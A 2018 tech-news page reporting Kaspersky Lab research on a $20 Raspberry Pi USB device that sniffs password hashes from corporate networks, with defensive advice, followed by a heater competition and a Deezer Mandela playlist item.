Connect with us

Featured

Hacking tools for $20

Published

on

Kaspersky Lab researchers have examined publicly available hardware and software tools for covert password interception and discovered that a hacking tool can be created for as little as $20.

In an experiment professionals used a DIY Raspberry Pi based USB-device, configured in a specific way, and carrying no malicious software. Armed with this device, they were able to covertly collect user authentication data from a corporate network at a rate of 50 password hashes per hour.

The research started with a real story: in another investigation that Kaspersky Lab experts participated in, an insider (the employee of a cleaning company) used a USB-stick to infect a workstation inside a targeted organisation with malware. Upon hearing the story, Kaspersky Lab security enthusiasts became curious about what else could be used by insiders to compromise a targeted network? And, would it be possible to compromise a network without any malware at all?

They took a Raspberry-Pi microcomputer, configured it as an Ethernet adapter, made some additional configuration changes in the OS running on the microcomputer, and installed a few publicly available tools for packet sniffing, data collection and processing. Finally, the researchers set up a server to collect intercepted data. After that, the device was connected to the targeted machine and started to automatically feed the server with stolen credential data.

The reason why this happened was that the OS on the attacked computer identified the connected Raspberry-Pi device as a wired LAN adapter, and automatically assigned it a higher priority than other available network connections and – more importantly – gave it access to data exchange in the network. The experimental network was a simulation of a segment of a real corporate network. As a result, researchers were able to collect authentication data sent by the attacked PC and its applications, as they tried to authenticate domain and remote servers. In addition, researchers were also able to collect this data from other computers in the network segment.

Moreover, as the specifics of the attack allowed for intercepted data to be sent through the network in real time, the longer the device was connected to the PC, the more data it was able to collect and transfer to a remote server. After just half an hour of the experiment researchers were able to collect nearly 30 password hashes, transferred through the attacked network, so it is easy to imagine how much data could be collected in just one day. In the worst-case scenario, the domain administrator’s authentication data could also be intercepted should they log into their account while the device is plugged-in into one of the PCs inside the domain.

The potential attack surface for this method of data interception is big: the experiment was successfully reproduced on both locked and unlocked computers running on Windows and Mac OS. However, researchers were not able to reproduce the attack on Linux based devices.

“There are two major things that we are worried about as a result of this experiment: firstly – the fact that we didn’t really have to develop the software – we used tools freely available on the Internet. Secondly – we are worried about how easy it was to prepare the proof of concept for our hacking device. This means that potentially anyone, who is familiar with the Internet and has basic programming skills, could reproduce this experiment. And it is easy to predict what could happen if this was done with malicious intent. The latter is the main reason why we decided to draw public attention to this problem. Users and corporate administrators should be prepared for this type of attack”, said Sergey Lurye, a security enthusiast and co-author of the research at Kaspersky Lab.

Although the attack allows for the interception of password hashes (a cipher-alphabetic interpretation of a plaintext password after it has been processed by a specific obfuscation algorithm), the hashes could be deciphered into passwords, since the algorithms are known or used in pass-the-hash attacks.

In order to protect your computer or network from attacks with help of similar DIY devices, Kaspersky Lab security experts recommend the following advice:

For regular users:

  1. On returning to your computer, check if there are any extra USB devices sticking out of your ports.
  2. Avoid accepting flash drives from untrusted sources. This drive could in fact be a password interceptor.
  3. Make a habit of ending sessions on sites that require authentication. Usually, this means clicking on a “log out” button.
  4. Change passwords regularly – both on your PC and the websites you use frequently. Remember that not all of your favourite websites will use mechanisms to protect against cookie data substitution. You can use specialised password management software for the easy management of strong and secure passwords, such as the free Kaspersky Password Manager.
  5. Enable two-factor authentication, for example, by requesting login confirmation or use of a hardware token.
  6. Install and regularly update a security solution from a proven and trusted vendor.

For system administrators

  1. If the network topology allows it, we suggest using solely Kerberos protocol for authenticating domain users.
  2. Restrict privileged domain users from logging into the legacy systems, especially domain administrators.
  3. Domain user passwords should be changed regularly. If, for whatever reason, the organisation’s policy does not involve regular password changes, be sure to change this policy.
  4. All of the computers within a corporate network have to be protected with security solutions and regular updates should be ensured.
  5. In order to prevent the connection of unauthorised USB devices, a Device Control feature, such as that available in the Kaspersky Endpoint Security for Business suite, can be useful.
  6. If you own the web resource, we recommend activating the HSTS (HTTP strict transport security) which prevents switching from HTTPS to HTTP protocol and spoofing the credentials from a stolen cookie.
  7. If possible, disable the listening mode and activate the Client (AP) isolation setting in Wi-Fi routers and switches, disabling them from listening to other workstation traffic.
  8. Activate the DHCP Snooping setting to protect corporate network users from capturing their DHCP requests by fake DHCP servers.

Besides intercepting the authentication data from a corporate network the experimental device can be used for collecting cookies from browsers on the attacked machines.

Featured

Win a Poster Heater with Gadget and Takealot.com

This winter Gadget and Takealot.com are giving away three Poster Heaters, which look like posters but become heaters when you plug them in.

Published

on

Three Gadget readers will each win a unit, valued at R550 each. To enter, follow @GadgetZA and @Takealot on Twitter and tell us on the @GadgetZA account how many Watts the heater consumes.

What’s the big deal about these heaters? Many of us are struggling to keep the balance between soaring electricity costs and the need to keep warm this winter.

However, the recently launched Poster Heater by EasyHeat and distributed in South Africa by Takealot.com is not only one of the most cost effective electric heaters currently on the market, it is also easy to setup and use.

As the name indicates, it is a poster similar to one you would hang on a wall. But, plug it in and it turns into a 300 Watt heater. The Poster Heater isn’t designed to heat hallways or large rooms, but rather smaller ones like a bedroom or a baby’s nursery or a dressing room.

It uses radiant heating, which means that it heats up in a couple of minutes and the heat is directed at the objects or people around it, quickly taking the chill out of the air and providing a comfortable ambient temperature.

The other advantage of radiant heating is that it doesn’t dry out the air like infrared or gas heaters. Users also don’t have to worry about their children or pets getting too close to it because, even though it gets hot, it can be touched.

To enter the competition follow the steps below:

Competition entry details:

1. Follow @GadgetZA and @Takealot on Twitter. (We will ONLY be accepting entires via Twitter, so please don’t enter through the comments section of this article.)

2. Tell us on Twitter, via @GadgetZA, mentioning @Takealot in your posting, how many Watts the Poster Heater consumes.

cleardot.gif3. The competition closes on 31 July 2018.

4. Winners will be notified via Twitter on 1 August and Takealot.com will be in touch to organise delivery.

5. The competition is only open to South African residents.

Continue Reading

Arts and Entertainment

Deezer to host Hotstix’s Mandela tribute playlist

Deezer is celebrating Nelson Mandela on the centenary of his birthday by hosting a tribute playlist created by music legend Sipho “Hotstix” Mabuse.  

Published

on

Mabuse, a legendary figure in African music, first rose to prominence in the 1970s with his band Harari and later developed a name for himself as a solo artist. One of his best known songs was the global hit BurnOut in the 1980s.

The playlist takes the listener on a captivating musical journey through the life of Nelson Mandela.  It was compiled by Mabuse, who consulted with Mandela’s family and friends to ensure that the music would be relevant and accurate. The playlist also features commentary by Mabuse, which was recorded in his Soweto home.  

“I have tried to tell the story of the music that Madiba loved,” says Mabuse. “The Playlist excludes the time in prison obviously, as Madiba would not have had exposure to music in that time.  We have focused on the music we know he loved before and after that period. This recording was really an emotional journey for me, but an incredible opportunity to document these memories.”

The playlist features the music the young Mandela loved, such as The Manhattan Brothers, Solomon Linda, Brenda Fassie and Miriam Makeba.  It includes struggle songs from Chicco, Johnny Clegg, Hugh Masekela and Yvonne Chaka Chaka.  The playlist also includes Mandela by Zahara, one of the younger artists who caught Madiba’s ear.

Mabuse also offers stories of his own songs, such as Shikisha, a song greatly beloved by the former President.

“I was delighted to share my thoughts and hope the listeners enjoyed the musical journey,” says Mabuse. “Madiba did enjoy music immensely and we all have a purpose wherever we are in the world to celebrate culture and to learn from different cultures and music forms and styles.”

This playlist was inspired by the Nelson Mandela 100 campaign, calling on corporates and individuals to act as sources of inspiration and engage in conversation and action.

Continue Reading

Trending

Copyright © 2018 World Wide Worx